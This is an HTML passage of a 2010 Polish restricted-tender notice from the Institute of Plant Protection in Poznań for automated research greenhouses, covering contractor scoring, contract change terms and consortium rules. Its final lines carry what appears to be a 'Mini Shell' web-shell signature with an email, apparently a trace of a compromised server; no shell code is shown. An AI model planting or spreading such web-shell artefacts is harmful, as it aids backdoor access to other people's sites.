<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Nie dotyczy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>Jeżeli liczba wykonawców, którzy spełniają warunki udziału w postępowaniu jest mniejsza lub równa 5 zamawiający zaprosi do składania ofert wszystkich wykonawców spełniających te warunki. 
Jeżeli liczba Wykonawców, którzy spełniają warunki udziału w postępowaniu będzie większa niż 5, zamawiający zaprosi do składania ofert pięciu wykonawców, którzy otrzymają najwyższe oceny spełniania warunków udziału w postępowaniu (największą liczbę punktów). Punktacja będzie przeprowadzona według następującej zasady: 
1. 10 punktów za każdą z 4 wykazanych (w celu spełnienia warunku posiadania wiedzy i doświadczenia) robót budowlanych  o wartości powyżej 1 mln złotych netto-każda- polegających na wykonaniu lub modernizacji szklarni specjalistycznych  dla jednostek naukowo-badawczych, dydaktycznych -które są wyposażone w pełną automatykę współpracującą ze stacją METEO w zakresie płynnej regulacji temperatury i wilgotności łącznie z archiwizacją danych w odniesieniu do funkcji:
-wietrzenia górnego i bocznego
- przesłon cieniujących
- zamgławiania wysokociśnieniowego
- temperatury urządzeń grzewczych
- oświetlenia asymilacyjnego
Brak któregokolwiek z ww. elementów automatyki powoduje nie przyznanie punktów. 
Za wykazane 4 roboty wg ww. parametrów można uzyskać maksymalnie 40 punktów.  Zamawiający przyzna punkty na podstawie referencji wykonawców, z których powinny wynikać wprost dane niezbędne do oceny i punktacji.

oraz 

2. 10 punktów za wyposażenie szklarni w klimatyzację mechaniczną opartą na centrali wody lodowej współpracującej z pełną automatyką.
Za wykazane 4 roboty wg ww. parametrów można uzyskać maksymalnie 40 punktów.  Zamawiający przyzna punkty na podstawie referencji wykonawców, z których powinny wynikać wprost dane niezbędne do oceny i punktacji.
3. W przypadku uzyskania tej samej ilości punktów przez kilku Wykonawców, o kolejności ich kwalifikacji do następnego etapu, decydować będzie suma wartości netto wszystkich 4 wykonanych i wykazanych robót budowlanych, spełniających warunki określone w pkt III 3. 2. 1. lit. a</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany umowy będą mogły nastąpić w następujących okolicznościach:

1. Umowa Instytutu Ochrony Roślin-Państwowego Instytutu Badawczego z  wykonawcą musi być zgodna z  umową Instytutu Ochrony Roślin-Państwowego Instytutu Badawczego z Ministerstwem Nauki i Szkolnictwa Wyższego określającą warunki realizacji projektu
2. Zaistnienie po zawarciu umowy przypadku siły wyższej ( w szczególności: powódź, pożar inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie, skażenie.
3. Zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron,
4. Konieczność wykonania robót dodatkowych nieobjętych zamówieniem i nie przekraczających 20% wartości realizowanego zamówienia), których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności
5. Powstanie rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji i jej zapisów przez strony,
6. Wystąpienie istotnych wad, braków dokumentacji związanej z realizacją przedmiotu zamówienia, skutkujących koniecznością dokonania poprawek lub uzupełnień , jeżeli uniemożliwia to lub istotnie wstrzymuje realizację określonego rodzaju robót mających wpływ na zmianę terminu realizacji zamówienia-zmianie ulegnie odpowiednio termin zamówienia, harmonogram robót,
7. Gdy zaistnieje inna niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna , ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności , skutkująca brakiem możliwości należytego wykonania umowy, zgodnie ze specyfikacją istotnych warunków zamówienia-Zamawiający dopuszcza możliwość zmiany umowy, w szczególności terminu realizacji zamówienia.
Ww. zmiany mogą zostać wprowadzone aneksem do umowy- który może zostać podpisany jedynie po podpisaniu przez Zamawiającego aneksu w tej sprawie do umowy z Ministerstwem Nauki i Szkolnictwa Wyższego określającej warunki realizacji projektu.
Uwagi dotyczące sposobu realizacji zamówienia:
Projekt pt. Modernizacja laboratoriów dla wzmocnienia innowacyjności badań w zakresie ochrony roślin i działań na rzecz gospodarki jest współfinansowany ze środków Unii Europejskiej ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Innowacyjna Gospodarka. Instytut Ochrony Roślin-PIB jest zobligowany do respektowania zwartej z Ministerstwem Nauki i Szkolnictwa Wyższego umowy, która ściśle określa warunki realizacji projektu. Warunki te będą również obowiązywały wykonawcę projektu. W szczególności dotyczyć to będzie harmonogramu, terminów wykonywania poszczególnych zadań-etapów, płatności. Wszelkie zmiany ww. umowy dotyczące realizacji projektu w części budowlanej muszą być respektowane przez wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> Nie dotyczy<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nie dotyczy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.03.2010 godzina 12:00, miejsce: siedziba zamawiającego: ul. Władysława Węgorka 20, 60-318 Poznań, budynek dyrekcyjny, pok. nr 11 na parterze.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. PROJEKT: MODERNIZACJA LABORATORIÓW DLA WZMOCNIENIA INNOWACYJNOŚCI BADAŃ W ZAKRESIE OCHRONY ROŚLIN I DZIAŁAŃ NA RZECZ GOSPODARKI- INSTYTUTU OCHRONY ROŚLIN-PAŃSTWOWEGO INSTYTUTU BADAWCZEGO JEST WSPÓŁFINANSOWANY PRZEZ UNIĘ EUROPEJSKĄ ZE ŚRODKÓW EUROPEJSKIEGO FUNDUSZU ROZWOJU REGIONALNEGO W RAMACH PROGRAMU OPERACYJNEGO INNOWACYJNA GOSPODARKA.

2. Ocena spełnienia warunków udziału w postępowaniu oraz kwalifikacja wykonawców do dalszego etapu postępowania nastąpi na podstawie złożonych przez wykonawców dokumentów i oświadczeń.

3. Wykonawca chcący uczestniczyć w niniejszym postępowaniu składa pisemny wniosek o dopuszczenie do udziału w postępowaniu. Zgodnie z art. 27 ust. 5 Prawa zamówień publicznych informacja o złożeniu tego wniosku może być przekazana telefonicznie przed upływem terminu składania wniosków. Wniosek uważa się za złożony w terminie, jeżeli przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu został on wysłany w formie pisemnej a Zamawiający otrzyma go nie później niż w terminie 7 dni od dnia upływu terminu składania wniosków.

4. Osoby uprawnione do kontaktów z wykonawcami zainteresowanymi udziałem w postępowaniu:
Janusz Domagała, tel.0 (61) 864-91-35, fax.0 (61) 867-63-01, e-mai j.domagala@ior.poznan.pl, w terminach: od poniedziałku do piątku w godz. pomiędzy 8.00 a 14.00


5. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np. w konsorcjum), w takim przypadku ich oferta musi spełniać następujące wymagania:
-Do podmiotów wspólnie ubiegających się o zamówienie publiczne stosuje się te same przepisy co do pojedynczego wykonawcy,
- W odniesieniu do wymagań podniesionych przez zamawiającego, każdy z wykonawców wchodzących w skład konsorcjum musi oddzielnie udokumentować, iż posiada uprawnienia do wykonywania określonej działalności lub czynności i nie podlega wykluczeniu na podstawie art. 24 ust 1 pkt 1-9 ustawy,
- Przy ocenie spełniania warunków, o których mowa w art. 22 ust 1 pkt 2 -4 brany będzie pod uwagę łączny potencjał techniczny i kadrowy wykonawców, ich łączną wiedzę i doświadczenie oraz łączną sytuację ekonomiczną i finansową,
- Oferta musi być podpisana w taki sposób, aby prawnie zobowiązywała wszystkich wykonawców występujących wspólnie,
- Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika (lidera) do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia  albo reprezentowania w postępowaniu i zawarcia umowy o udzielenie przedmiotowego zamówienia publicznego,; umocowanie może wynikać z treści umowy konsorcjum lub zostać przedłożone oddzielnie wraz z wnioskiem o dopuszczenie do udziału w przetargu. Treść pełnomocnictwa powinna dokładnie określać zakres umocowania..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com